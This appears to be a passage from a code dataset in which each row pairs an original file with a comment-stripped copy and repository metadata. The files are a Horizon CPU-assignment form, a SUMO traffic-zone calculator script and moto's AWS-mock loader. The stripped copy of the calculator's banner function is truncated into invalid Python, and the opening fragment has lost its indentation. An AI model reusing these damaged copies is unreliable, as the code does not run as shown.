host = sysinv.host_get(self.request, host_id)
cpudata = {}
sharedcpudata = {}
platformcpudata = {}
for key, val in data.items():
if 'num_cores_on_processor' in key or 'function' in key:
if key not in self.fields:
cpudata[key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
cpudata[key] = val
if 'platform_processor' in key:
update_key = 'num_cores_on_processor' + key[-1:]
if key not in self.fields:
platformcpudata[update_key] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
platformcpudata[update_key] = val
if 'num_shared_on_processor' in key:
key2 = key.replace('shared', 'cores')
if key not in self.fields:
sharedcpudata[key2] = val
elif not type(self.fields[key].widget) is\
forms.widgets.HiddenInput:
sharedcpudata[key2] = val
sharedcpudata['function'] = 'shared'
platformcpudata['function'] = 'platform'
sysinv.host_cpus_modify(request, host.uuid,
platformcpudata,
cpudata,
sharedcpudata)
msg = _('CPU Assignments were successfully updated.')
LOG.debug(msg)
messages.success(request, msg)
return self.host.cpus
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[host_id])
return shortcuts.redirect(redirect)
except Exception as e:
LOG.exception(e)
msg = _('Failed to update CPU Assignments.')
LOG.info(msg)
redirect = reverse(self.failure_url, args=[host_id])
exceptions.handle(request, msg, redirect=redirect)
class AddCpuProfile(forms.SelfHandlingForm):
host_id = forms.CharField(widget=forms.widgets.HiddenInput)
profilename = forms.CharField(label=_("Cpu Profile Name"),
required=True)
failure_url = 'horizon:admin:inventory:detail'
def __init__(self, *args, **kwargs):
super(AddCpuProfile, self).__init__(*args, **kwargs)
def clean(self):
cleaned_data = super(AddCpuProfile, self).clean()
return cleaned_data
def handle(self, request, data):
cpuProfileName = data['profilename']
try:
cpuProfile = sysinv.host_cpuprofile_create(request, **data)
msg = _(
'Cpu Profile "%s" was successfully created.') % cpuProfileName
LOG.debug(msg)
messages.success(request, msg)
return cpuProfile
except exc.ClientException as ce:
messages.error(request, ce)
LOG.error(ce)
redirect = reverse(self.failure_url, args=[data['host_id']])
return shortcuts.redirect(redirect)
except Exception:
msg = _('Failed to create cpu profile "%s".') % cpuProfileName
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['host_id']])
exceptions.handle(request, msg, redirect=redirect)
| true | true |
f7191d9a9dc651d2b6f271add852f02c238d421a | 272 | py | Python | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/crs_ref.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| 22.666667 | 63 | 0.731618 | from dataclasses import dataclass
from bindings.csw.general_conversion_ref_type import CrsrefType
__NAMESPACE__ = "http://www.opengis.net/gml"
@dataclass
class CrsRef(CrsrefType):
class Meta:
name = "crsRef"
namespace = "http://www.opengis.net/gml"
| true | true |
f7191efcb8f233967b15e0f9433e0c54a591c370 | 3,760 | py | Python | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | 3 | 2019-11-20T15:22:27.000Z | 2021-06-13T07:52:14.000Z | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null | tools/TAZ_CALCULATOR/mutraff_tazcalc.py | uahservtel/uah-gist-mutraff-bastra | b5a4eab4763e1cf9d914c4af8a77426391e71e31 | [
"Xnet",
"Linux-OpenIB",
"X11"
] | null | null | null | '''
Created on 09/12/2016
@author: Alvaro Paricio
@description: Calculator of TRAFFIC ASSIGNMENT ZONES (TAZ). Given a networkfile and a polygon description, get all the nodes of the network included inside the polygon.
'''
import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
# --------------------------------------------------------------
opts= {}
# --------------------------------------------------------------
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
# REQUIRED OPTS
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
# OPTIONAL OPTS
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
# --------------------------------------------------------------
def printBanner():
# Take here the banner: http://patorjk.com/software/taag/#p=display&f=Doom&t=mutraff%20odgen
# Font: Doom
print(" _ __ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| 45.301205 | 183 | 0.611702 | import sys
sys.path.insert(1,'lib')
import argparse as arg
from TazGeometry import taz_test, MuTazCalculator
opts= {}
def getConfig():
parser = arg.ArgumentParser(
prog="mutraff_tazcalc",
formatter_class=arg.RawDescriptionHelpFormatter,
description='''\
MuTRAFF TAZ Calculator
Given an XML taz definition file based on polygon coordinates in GPS format(lat,lon), generate the associated SUMO TAZ definiton file with the edges contained inside each taz polygon.
Examples:
* Generate the TAZs associated to a given polygon:
python mutraff_tazcalc.py -net alcalahenares.net.xml -nod alcalahenares.nod.xml -edg alcalahenares.edg.xml -mutaz alcalahenares.mutaz.xml -sumo_taz alcalahenares.taz.xml
''')
parser.add_argument( "-net","--in-net", help='Input. SUMOs XML net description file', default="mutraff.net.xml", required=True)
parser.add_argument( "-nod","--in-nodes", help='Input. SUMOs XML nodes description file', default="mutraff.nod.xml", required=True)
parser.add_argument( "-edg","--in-edges", help='Input. SUMOs XML edges description file', default="mutraff.edg.xml", required=True)
parser.add_argument( "-mutaz","--in-mutaz", help='Input. MUTRAFF XML description file', default="mutraff.mutaz.xml", required=True)
parser.add_argument( "-sumo_taz","--out-sumo-taz", help='Output. Generate output to SUMO TAZ XML description file', required=False)
parser.add_argument( "-p","--net-path", help='Input. Path to locate files', default='.' )
parser.add_argument( "-v","--verbose", help='Verbose output', default=False, action='store_true')
parser.add_argument( "-t","--run-tests", help='Run tests', default=False, action='store_true')
parser.add_argument( "-i","--taz-id-seed", help='USe this number as TAZ id numbering seed', default="1000", required=False)
options = vars(parser.parse_args())
options['in_net'] = options['net_path'] + '/' + options['in_net']
options['in_nodes'] = options['net_path'] + '/' + options['in_nodes']
options['in_edges'] = options['net_path'] + '/' + options['in_edges']
options['in_mutaz'] = options['net_path'] + '/' + options['in_mutaz']
if 'out_sumo_taz' in options and options['out_sumo_taz']:
options['out_sumo_taz'] = options['net_path'] + '/' + options['out_sumo_taz']
if( options['verbose'] ):
print(options)
return options
def printBanner():
__ __ _ _ ")
print(" | | / _|/ _| | | | | ")
print(" _ __ ___ _ _| |_ _ __ __ _| |_| |_ | |_ __ _ _______ __ _| | ___ ")
print("| '_ ` _ \| | | | __| '__/ _` | _| _| | __/ _` |_ / __/ _` | |/ __|")
print("| | | | | | |_| | |_| | | (_| | | | | | || (_| |/ / (_| (_| | | (__ ")
print("|_| |_| |_|\__,_|\__|_| \__,_|_| |_| \__\__,_/___\___\__,_|_|\___|\n")
print(" MUTRAFF TAZ Calculator")
print(" alvaro.paricio@uah.es")
print("")
if __name__ == '__main__':
printBanner()
opts=getConfig()
if( opts['run_tests'] ):
taz_test()
else:
tazcalc = MuTazCalculator(opts)
tazcalc.loadData()
tazcalc.calculateTazs()
tazcalc.dumpTazFile()
| true | true |
f7191f1eaaa578d51a94826ccc2ece39d7ec093d | 9,695 | py | Python | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | moto/__init__.py | hudelgado/moto | b8cd79cd06a6cc591b0a51086ead50609af4dd4d | [
"Apache-2.0"
] | null | null | null | import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
# import logging
# logging.getLogger('boto').setLevel(logging.CRITICAL)
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
# Need to monkey-patch botocore requests back to underlying urllib3 classes
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| 43.671171 | 100 | 0.749252 | import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| true | true |
f719218d3fe98d1455ee9174e8b9c5286ddf7b15 | 670 | py | Python | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
] | null | null | null | src/LocalChoiceModel/vel_param.py | noashin/local_global_attention_model | 531e6a4cc1dc364a6a4168de1b9f972727a8aeb1 | [
"MIT"
